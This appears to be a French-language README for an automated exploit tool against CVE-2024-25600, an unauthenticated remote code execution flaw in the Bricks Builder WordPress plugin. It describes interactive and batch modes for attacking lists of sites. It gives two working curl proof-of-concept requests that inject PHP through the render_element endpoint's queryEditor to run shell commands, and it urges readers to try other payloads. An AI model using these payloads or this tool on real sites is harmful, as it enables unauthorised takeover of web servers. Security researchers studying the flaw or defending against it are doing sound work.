
Outil d'exploitation automatisé pour CVE-2024-25600, permettant l'exécution de code à distance non authentifiée sur des sites WordPress utilisant le plugin Bricks Builder. Prend en charge les modes interactif et par lots pour l'exécution de commandes.
Cet outil 🛠️ est conçu pour exploiter la vulnérabilité CVE-2024-25600 🕳️ trouvée dans le plugin Bricks Builder pour WordPress. La vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻. L'outil automatise le processus d'exploitation en récupérant des nonces et en envoyant des requêtes spécialement conçues pour exécuter des commandes arbitraires.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> pour démarrer le mode interactif.python exploit.py -l <file_path> pour analyser et exploiter les sites listés.Le PoC de base fourni par la divulgation est le suivant :
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Mise à jour : Second PoC (plus fiable)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Il est possible que des charges utiles supplémentaires produisent de meilleurs résultats. Si mon exploit ou ma preuve de concept ne fonctionne pas pour vous, je vous encourage à expérimenter avec des charges utiles alternatives pour trouver une solution plus efficace.
Remplacez [HOST] par le site web cible et [NONCE] par la valeur du nonce récupérée depuis le site.
Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez vous référer à la divulgation détaillée sur Snicco.io.
Les informations fournies dans ce README sont uniquement à des fins éducatives. Le piratage non autorisé de sites web ou de réseaux est illégal et contraire à l'éthique. 🚫
Félicitations aux chercheurs en sécurité qui ont découvert et signalé cette vulnérabilité, fournissant à la communauté des informations et des outils pour aider à sécuriser leurs applications web.